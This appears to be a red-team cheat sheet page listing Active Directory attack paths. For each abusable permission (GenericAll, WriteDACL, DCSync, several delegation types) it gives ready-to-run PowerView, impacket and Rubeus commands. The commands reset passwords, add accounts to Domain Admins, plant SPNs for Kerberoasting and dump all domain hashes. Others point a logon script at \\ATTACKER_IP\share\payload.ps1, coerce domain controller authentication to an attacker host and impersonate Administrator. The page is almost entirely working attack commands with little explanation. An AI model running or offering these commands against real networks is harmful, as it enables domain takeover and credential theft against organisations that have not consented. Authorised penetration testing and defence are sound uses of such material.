Attack Paths - BookJMP

GenericAll

Reset target user password.

Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)

rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"

Add target user to Domain Admins.

Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET

net rpc group addmem "Domain Admins" "TARGET" -U "DOMAIN/USER%Password" -S DC01

ForceChangePassword

Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)

rpcclient -U "DOMAIN/USER%Password" DC01 -c "setuserinfo2 TARGET 23 'NewP@ss123'"

impacket-changepasswd 'DOMAIN/ATTACKER:Password@DC01' -newpass 'NewP@ss123' -altuser TARGET -altdomain DOMAIN

AddMember

Add-DomainGroupMember -Identity 'Domain Admins' -Members TARGET

net rpc group addmem "Domain Admins" "TARGET" -U "DOMAIN/USER%Password" -S DC01

GenericWrite

Write a SPN to Kerberoast the target.

Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='nonexistent/BLAH'}

impacket-addspn -u 'DOMAIN\ATTACKER' -p 'Password' -s 'nonexistent/BLAH' -t 'TARGET' DC01

Abuse logon script for code execution.

Set-DomainObject -Identity TARGET -Set @{scriptpath='\\ATTACKER_IP\share\payload.ps1'}

WriteDACL

Grant DCSync rights to controlled user.

Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity ATTACKER -Rights DCSync

Grant full control over a target object.

Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All

WriteOwner

Take ownership then grant full control.

Set-DomainObjectOwner -Identity TARGET -OwnerIdentity ATTACKER
Add-DomainObjectAcl -TargetIdentity TARGET -PrincipalIdentity ATTACKER -Rights All

AllExtendedRights

Reset target password.

Set-DomainUserPassword -Identity TARGET -AccountPassword (ConvertTo-SecureString 'NewP@ss123' -AsPlainText -Force)

Add SPN for Kerberoasting.

Set-DomainObject -Identity TARGET -Set @{serviceprincipalname='fake/spn'}
Get-DomainSPNTicket -SPN 'fake/spn' | ConvertTo-Hashcat

DCSync (GetChanges + GetChangesAll)

Dump all domain hashes.

impacket-secretsdump 'DOMAIN/USER:Password@DC01'

Dump only NTLM hashes.

impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-ntlm

Dump a specific user.

impacket-secretsdump 'DOMAIN/USER:Password@DC01' -just-dc-user krbtgt

Pass-the-Hash variant.

impacket-secretsdump 'DOMAIN/USER@DC01' -hashes LMHASH:NTHASH -just-dc-ntlm

Unconstrained Delegation

Monitor for incoming TGTs (run on compromised host with unconstrained delegation).

.\Rubeus.exe monitor /interval:5 /nowrap

Trigger DC authentication via PrinterBug.

impacket-printerbug 'DOMAIN/USER:Password@DC01' ATTACKER_IP

Trigger DC authentication via PetitPotam (unauthenticated).

impacket-petitpotam ATTACKER_IP DC01

Extract captured TGT and pass it.

.\Rubeus.exe ptt /ticket:<base64>

Constrained Delegation (S4U2Proxy)

Impersonate Domain Admin to target service.

.\Rubeus.exe s4u /user:SVC_ACCOUNT /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/DC01.domain.local /ptt

impacket-getST -spn 'cifs/DC01.domain.local' -impersonate Administrator 'DOMAIN/SVC_ACCOUNT' -hashes LMHASH:NTHASH

export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass 'DOMAIN/[email protected]'

Resource-Based Constrained Delegation (RBCD)

Add attacker-controlled computer to target’s msDS-AllowedToActOnBehalfOfOtherIdentity.

Set-DomainRBCD -Identity TARGET_COMPUTER -DelegateFrom ATTACKER_COMPUTER

impacket-rbcd -f ATTACKER_COMPUTER -t TARGET_COMPUTER -dc-ip DC01 'DOMAIN/USER:Password'

Impersonate Administrator.

impacket-getST -spn 'cifs/TARGET_COMPUTER.domain.local' -impersonate Administrator 'DOMAIN/ATTACKER_COMPUTER$' -hashes LMHASH:NTHASH

Documentation Index

​GenericAll

​ForceChangePassword

​AddMember

​GenericWrite

​WriteDACL

​WriteOwner

​AllExtendedRights

​DCSync (GetChanges + GetChangesAll)

​Unconstrained Delegation

​Constrained Delegation (S4U2Proxy)

​Resource-Based Constrained Delegation (RBCD)

​References